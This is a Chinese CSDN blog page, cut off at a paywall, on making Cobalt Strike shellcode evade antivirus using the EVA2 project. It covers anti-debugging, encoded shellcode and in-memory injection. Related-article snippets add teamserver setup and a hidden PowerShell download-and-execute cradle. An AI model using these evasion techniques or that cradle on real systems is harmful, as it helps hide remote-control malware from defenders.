CS免杀之信手拈来

最新推荐文章于 2025-04-10 10:04:57 发布
最新推荐文章于 2025-04-10 10:04:57 发布
阅读量1.7k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gamma_lab/article/details/119451187
版权
本文介绍了作者在实现CS免杀过程中遇到的挑战,如卡巴斯基全方位版的查杀。通过参考GitHub上的EVA2项目,采用反调试技术和内存中的shellcode解密注入等方法,成功绕过了Windows Defender等主流杀毒软件。但最终发现,卡巴斯基的内存查杀机制导致免杀失败,强调了内存特征在免杀中的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

最近搞了一个cs免杀的东西出来,主流的杀毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存查杀,如果是内存查杀,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的杀毒机制,就哦豁了。
然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。

免杀实践

项目地址:

https://github.com/ORCA666/EVA2

根据作者描述,这个项目是用来过windows defender的,但是windows defender都能过,那国内的杀软基本是都查杀不出来。
采用的技术有:

  • 反调试技术
  • 编码的shellcode
  • shellode的解密和注入发生在内存中[逐字节],因此被检测到的机会更少
  • 使用系统调用
    项目还细心配置了**.profile**文件,真不错嗷

1.首先cs生成shellcode,直接生成c文件格式的,64位的(32位不支持)

把生成的shellcode放入encoder.py 文件
在这里插入图片描述
python2 运行,获得加密后的shellcod

最低0.47元/天 解锁文章
Gamma_lab
关注
CS(Cobaltstrike)和使用(附脚本)
hackzkaq的博客
07-23 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-hpb1分享! 一.Cobaltstrike简介 作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选 fireeye多次分析过实用cobaltstrike进行apt的案例。 Cobaltstrike安装 CS需要一个服务器来进行,我们把它放到服务器上。 然后运行./teaserver ip 密码即可。 然后使用CS客户端连接即可,输入对应ip、端口和密码。
内网渗透-CS与应用开发
zj2084的博客
03-27 843
再做上面那一步的操作之前,我们先将这段加载器代码放到我们的csshellenc.py里面,将csshellenc.py里面的加密代码先给注释了,看看可不可以上线,也就是看看加载器代码有没有区别。然后在Kali启动我们的客户端,打开cobaltstrike的界面,建立与我们的公网服务器的来连接,端口是50050,用户名随便输,密码是我们刚刚启动teamserver的密码。代码我们已经搞定了,我们该如何去包装一下这个木马,把这个木马包装到正儿八经的应用程序当中去,然后再去做分发。
内网横向对抗渗透,从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
04-10 1010
可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这次我们选择潮汐shellcode,体积小,上传速度快,简直是居家旅行必备。1、先试试CS自带的插件提权,结果,卒!3、别慌,祭出“java反序列化终极测试工具 by 6哥”,一击命中,瞬间拿下!2、然而,理想很丰满,现实很骨感。1、既然硬的不行,那就来软的,尝试关闭软。3、粘贴到潮汐网站,生成exe,上传到目标机器,执行!,摸清系统版本和补丁信息,知己知彼,百战不殆。3、找到几个EXP,上传测试,结果,全部阵亡。
CS教程
星河梦瑾的博客
10-30 612
这块本来就不是web狗擅长的,而且作为一个web狗也没必要花太多时间来折腾这个,达到能用就行,不要追求全部,能目标就行。首先使用sgn.exe这个脚本生成一个sgn文件,然后再把他放到bypass里面就重新生成一个exe文件即可。这一个可以过火绒但是过不了windows,下面这个是可以过windows但是过不了火绒的。将木马存放在刚刚的bypass的文件夹里。会生成一个patch的文件,改名就可以了。启动后选择自己的需要编译的木马文件。3、在自己的CS里面生成一个脚本。然后等待编译完成即可。
cs(一)
kuuhh的博客
08-12 696
前言 网上搜了几篇文章复现下操作。 ps1文件 生成ps1文件 将关键字FromBase64String括号内的字符串复制起来。 将下面代码保存改为ps1文件执行 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串') $s |foreach { $string = $string + $_.ToString()+','} $string > d:\1.txt 代码输出到1.t
CS——ps1
qinjilll的博客
09-21 1508
❤️🔥🎉。
红蓝对抗经验分享:CS姿势
m0_61869253的博客
07-27 633
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。赛门铁克也未报毒,其它软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。
CS-Loader:CS
03-22
CS-避CS,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静+动,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS(已完成) V1.7:加入Powershell的(已完成) V2.0:开发出UI界面 V2.0:开发成在线平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多技术(想去研究下进程注入/文件捆绑,不知道效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
CS姿势
YJ_12340的博客
08-03 699
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意之后的效果是最重要的。
CS
anwen12的博客
02-06 5373
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
木马CS与应用开发
没有网络安全就没有国家安全
03-09 671
木马之CobalStrike与应用开发
必备工具cs32asm
03-03
工具cs32大家不会陌生吧 用于特征码的 填充修改 必备
CS-Avoid-killing:CS加载器
05-05
CS-Avoid-killing :cricket_game: CS,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0: 目前测试可以过Defender/火绒的静+动,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5: 加入C版本CS(已完成) V1.7:加入Powershell的(已完成) V2.0:开发出UI界面 V2.0: 开发成在线平台(已完成) PS: 在实际使用中发现图形化界面不利于和其他工具结合,相比之下命令行的方式更具有扩展性 关于自己写的在线平台,暂不考虑开源,主要是觉得目前的技术还比较薄弱,如果有想加入团队一起研发的师傅或者是想体验可以联系我 V3.0: 想办法结合更多技术(想去研究下进程注入/文件捆绑,不知道效果怎样) V3.1 增加了go版本(可过火绒/3
简单快捷的 CS 一键插件 CSx3Ldr
yutianovo的博客
02-20 988
Cobalt Strike插件
cs之基于混淆和加壳
weixin_54855337的博客
04-14 4314
写在前面 最近也是没什么状态以及被身边人,事,物所受影响,环境对自己的影响也是非常大,但是随着时间的变化一切也都会改变,离群所居者,不是神灵,就是野兽,所以说需要脱离这种状态,找到自己人生中明确的方向,不能一天天的萎靡不正 简单进行混淆和加壳 其实早在去年11月左右就玩过一点cs,但是那个时候还是懵懵懂懂,虽然现在也是一样的 打开服务端,192.168.4.191为自己的ip也可以127.0.0.1,然后123123为连接密码 使用java或者bat再或者sh打开都可以,然后就是双..
插件分享 | 简单绕过和利用上线的 GoCS
m0_46699477的博客
08-17 566
插件分享 | 简单绕过和利用上线的 GoCS 原创 hututuZh GobySec 昨天 收录于话题 #插件 4个 图片 图片 Goby社区第17 篇插件分享文章 全文共:6214 字 预计阅读时间:16 分钟 前言:Goby 可以快速准确的扫描资产,并直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会
网络安全进阶篇之(十四章-4) py3的CS过火绒
划水的小白白
05-20 644
文章目录一、 概念1.1 360 安全卫士和 360 毒1.2 Python二、前期准备2.1 python下载地址三、具体过程3.1 CS生成payload3.2 编译python代码框架3.3 将py文件生成exe 一、 概念 1.1 360 安全卫士和 360 毒 360 毒是 360 安全中心出品的一款费的云安全毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、360 主动防御引擎以
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值